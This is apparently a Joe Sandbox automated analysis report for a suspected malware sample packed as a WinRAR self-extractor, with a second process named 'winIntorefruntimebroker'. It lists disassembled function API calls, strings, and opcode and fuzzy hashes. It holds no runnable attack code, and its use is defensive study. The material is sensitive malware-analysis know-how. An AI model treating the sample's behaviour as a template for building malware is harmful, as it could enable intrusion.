                                        • __EH_prolog.LIBCMT ref: 002D75E3
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                          • Part of subcall function 002DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 002DA598
                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D777F
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA501
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA532
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                        • String ID: :
                                        • API String ID: 3226429890-336475711
                                        • Opcode ID: 84d9d56c56c69c052af2fe2ae5e6c0f54975fb29613af011f6e36622a6722e8a
                                        • Instruction ID: 6eee4efe175e0d8dca1b1b569aa7a13956fc19550f75e2f2c5ebb64d94ec03e1
                                        • Opcode Fuzzy Hash: 84d9d56c56c69c052af2fe2ae5e6c0f54975fb29613af011f6e36622a6722e8a
                                        • Instruction Fuzzy Hash: A4419371811158A9EB25EB64CC59EEEB37CAF55300F404097B609A3292EB745F95CF60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr
                                        • String ID: *
                                        • API String ID: 2691759472-163128923
                                        • Opcode ID: 469db590fd42c1805208f612485e94937c424d350a132cd10491963a9d09d7c9
                                        • Instruction ID: 6b7193bd70b8d18ca4d911174ae2cc6668a4f1d1131dc5e2d386cea120ca5ede
                                        • Opcode Fuzzy Hash: 469db590fd42c1805208f612485e94937c424d350a132cd10491963a9d09d7c9
                                        • Instruction Fuzzy Hash: 0E314626568302DACB32EE148932A7B73E4DF95B64F17801FFD8447343E7668C61A361
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: }
                                        • API String ID: 176396367-4239843852
                                        • Opcode ID: ff94fb0fe6046b63263bbe244dfedc178aa49a65d80591bd2cb2cb544de945f0
                                        • Instruction ID: 7ebb8aa90adfc7f4426d4c73190600c54332be99b9c696611e844c9c82ecc138
                                        • Opcode Fuzzy Hash: ff94fb0fe6046b63263bbe244dfedc178aa49a65d80591bd2cb2cb544de945f0
                                        • Instruction Fuzzy Hash: 8721237296438B5AD732EE65D845E7BB3ECDF90750F80042AF640C3141EB65DE688BB2
                                        APIs
                                          • Part of subcall function 002DF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002DF2E4
                                          • Part of subcall function 002DF2C5: GetProcAddress.KERNEL32(003181C8,CryptUnprotectMemory), ref: 002DF2F4
                                        • GetCurrentProcessId.KERNEL32(?,?,?,002DF33E), ref: 002DF3D2
                                        Strings
                                        • CryptUnprotectMemory failed, xrefs: 002DF3CA
                                        • CryptProtectMemory failed, xrefs: 002DF389
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        • Opcode ID: e6f7fb5508175540b5d88b18e5fa3f6d9c0adcfc0dd12fc1becf1b2104245a01
                                        • Instruction ID: eaf1c0cdcd7212884474922fd6ec897929d971849ecc682e28cf0e47fe33a8d8
                                        • Opcode Fuzzy Hash: e6f7fb5508175540b5d88b18e5fa3f6d9c0adcfc0dd12fc1becf1b2104245a01
                                        • Instruction Fuzzy Hash: DD115C326112556BDF965F20DD496AE371CFF04760F064167FC425B391DA709E218B98
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00010000,002E1160,?,00000000,00000000), ref: 002E1043
                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 002E108A
                                          • Part of subcall function 002D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D6C54
                                          • Part of subcall function 002D6DCB: _wcschr.LIBVCRUNTIME ref: 002D6E0A
                                          • Part of subcall function 002D6DCB: _wcschr.LIBVCRUNTIME ref: 002D6E19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                        • String ID: CreateThread failed
                                        • API String ID: 2706921342-3849766595
                                        • Opcode ID: dc73bb08b81ff962bb68dee8710a7bfa079774e08a92a55146d25983082163d1
                                        • Instruction ID: c9fd2b8fe9075346eb5927d6271821caa0a1638203eab33c9116dd638b37f7eb
                                        • Opcode Fuzzy Hash: dc73bb08b81ff962bb68dee8710a7bfa079774e08a92a55146d25983082163d1
                                        • Instruction Fuzzy Hash: 85012BB5391349ABD3355F25EC55BF6735CEB44350F10003FFA8752280CAB06DA48624
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr
                                        • String ID: <90$?*<>|"
                                        • API String ID: 2691759472-290932987
                                        • Opcode ID: 5a0b692f4d558e1ac97a7514bf446ee0a2254f671ea7f70d46bac321b3188fa9
                                        • Instruction ID: 7f61f74737f5d7d5a3c9c8603763cb93aac6ba69b3f39c31f3af19fce747a93a
                                        • Opcode Fuzzy Hash: 5a0b692f4d558e1ac97a7514bf446ee0a2254f671ea7f70d46bac321b3188fa9
                                        • Instruction Fuzzy Hash: 5FF08657565703C5C7341E249811736B3E9EFA5731F38441FE5C5873C2EAA18CD0C695
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: Software\WinRAR SFX$.
                                        • API String ID: 176396367-1718270432
                                        • Opcode ID: bbee5de65c5aec7ab4a90218ce90ecc50e2777728c65d4d6583e460fd781726e
                                        • Instruction ID: 9fdb855ffd51cde0552f0b950daea6c52ca32a8da167a3e1cfad8f5fc50acd13
                                        • Opcode Fuzzy Hash: bbee5de65c5aec7ab4a90218ce90ecc50e2777728c65d4d6583e460fd781726e
                                        • Instruction Fuzzy Hash: 5601A731551158BAEF229F92DC49FDF7F7CEF09395F404056B509910A0DBB04B98CBA1
                                        APIs
                                          • Part of subcall function 002DC29A: _wcslen.LIBCMT ref: 002DC2A2
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E1FE5
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E1FF6
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E2006
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E2014
                                          • Part of subcall function 002E1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,002DB371,?,?,00000000,?,?,?), ref: 002E202F
                                          • Part of subcall function 002EAC04: SetCurrentDirectoryW.KERNELBASE(?,002EAE72,C:\Users\user\Desktop,00000000,0031946A,00000006), ref: 002EAC08
                                        • _wcslen.LIBCMT ref: 002EAE8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$CompareCurrentDirectoryString
                                        • String ID: <.$C:\Users\user\Desktop
                                        • API String ID: 521417927-3226724814
                                        • Opcode ID: cbde78f4e5d0cbdc8f7d5bdefa164850c7ef11cb88a896b97478b3c1c28c2b21
                                        • Instruction ID: 4d88f2804e4849ea061994aca6fc51fcef8f3ef8b6297357e1e386682d87a71c
                                        • Opcode Fuzzy Hash: cbde78f4e5d0cbdc8f7d5bdefa164850c7ef11cb88a896b97478b3c1c28c2b21
                                        • Instruction Fuzzy Hash: CD01B571D5025955DF11ABA6DD0AEDE73BCAF0C300F100426F501E3181EAB4A6A48EA1
                                        APIs
                                          • Part of subcall function 002F97E5: GetLastError.KERNEL32(?,00311030,002F4674,00311030,?,?,002F3F73,00000050,?,00311030,00000200), ref: 002F97E9
                                          • Part of subcall function 002F97E5: _free.LIBCMT ref: 002F981C
                                          • Part of subcall function 002F97E5: SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F985D
                                          • Part of subcall function 002F97E5: _abort.LIBCMT ref: 002F9863
                                        • _abort.LIBCMT ref: 002FBB80
                                        • _free.LIBCMT ref: 002FBBB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLast_abort_free
                                        • String ID: p0
                                        • API String ID: 289325740-140255176
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Malloc
                                        • String ID: (.$Z.
                                        • API String ID: 2696272793-4154499658
                                        APIs
                                          • Part of subcall function 002FBF30: GetEnvironmentStringsW.KERNEL32 ref: 002FBF39
                                          • Part of subcall function 002FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002FBF5C
                                          • Part of subcall function 002FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002FBF82
                                          • Part of subcall function 002FBF30: _free.LIBCMT ref: 002FBF95
                                          • Part of subcall function 002FBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002FBFA4
                                        • _free.LIBCMT ref: 002F82AE
                                        • _free.LIBCMT ref: 002F82B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                        • String ID: 0"3
                                        • API String ID: 400815659-3276282804
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,002E1206,?), ref: 002E0FEA
                                        • GetLastError.KERNEL32(?), ref: 002E0FF6
                                          • Part of subcall function 002D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D6C54
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002E0FFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 1091760877-2248577382
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,002DDA55,?), ref: 002DE2A3
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,002DDA55,?), ref: 002DE2B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE467
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: p.$z.
                                        • API String ID: 1269201914-4095521071
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE467
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: U.$p.
                                        • API String ID: 1269201914-1231522331
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {
                                        • API String ID: 0-366298937
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bf09ff2bd24c779059cc3e44342e90ab685ef5fff63e3d66dbbd00ae61a1a8
                                        • Instruction ID: 19967951b21728b5968b3a300174383272e792a3293df820e3425aa618ac1566
                                        • Opcode Fuzzy Hash: 16bf09ff2bd24c779059cc3e44342e90ab685ef5fff63e3d66dbbd00ae61a1a8
                                        • Instruction Fuzzy Hash: FDF0BD30A1894DDFDF94EF58C449AAA7BF0FF68304F0104A6F818C3264D634E594CB81
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 125d53d462be2817477351489d7b70279e8761ab25da074e2abf15c0a2ff3aca
                                        • Instruction ID: 73dea8ba1599c6944f489e8762f7e62bd6262b1fe0ef9e7ecec8cb3a66b01ed8
                                        • Opcode Fuzzy Hash: 125d53d462be2817477351489d7b70279e8761ab25da074e2abf15c0a2ff3aca
                                        • Instruction Fuzzy Hash: 91F01C3091594E9FEF94EFA8C8596EA7BE0FF18304F010576E81DD21A4DB34A6A0CB81
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 861c413314a845d854fab3cddfd306ccf832981e849265e2dc6511061f009ac7
                                        • Instruction ID: aef364c387d7f36f1aecd88dc9f555a878196a2a2448d7df5cc717add8be6d89
                                        • Opcode Fuzzy Hash: 861c413314a845d854fab3cddfd306ccf832981e849265e2dc6511061f009ac7
                                        • Instruction Fuzzy Hash: 99F0A935B09A4D9BCB20EFA8D9006EE7BA0FF84300F000476E06DC2090EA34A728C741
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e660f0f74f8aeb7584f1f1294d4ffdcd2f30a735bbd07e71f0a663f65fdc695
                                        • Instruction ID: 8643a2d8ebde5884a5d2dac3299fb0e52e4dcc2c433162235c2ff5df8bafffdf
                                        • Opcode Fuzzy Hash: 2e660f0f74f8aeb7584f1f1294d4ffdcd2f30a735bbd07e71f0a663f65fdc695
                                        • Instruction Fuzzy Hash: 35F06270B1E91A8BE758DF94C8546FD77B1FF58701F04067AD029932A2CB786640CB81
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction ID: f71c2c8c3e271018d5b9cbdc956c1cda60d83960aaca81e3b32d14d19cfef341
                                        • Opcode Fuzzy Hash: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction Fuzzy Hash: 45F0B770A0A9198BFB64AB94C8543A9B7A0EF89300F2150AD915EA3391DE385A858F45
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
                                        • Instruction ID: 5d63c56915812d337c7653ff9f1698c0f559071763a5be183b61c3ab26af03af
